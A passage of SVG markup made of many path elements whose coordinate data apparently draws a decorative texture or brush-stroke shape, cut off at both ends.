.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path 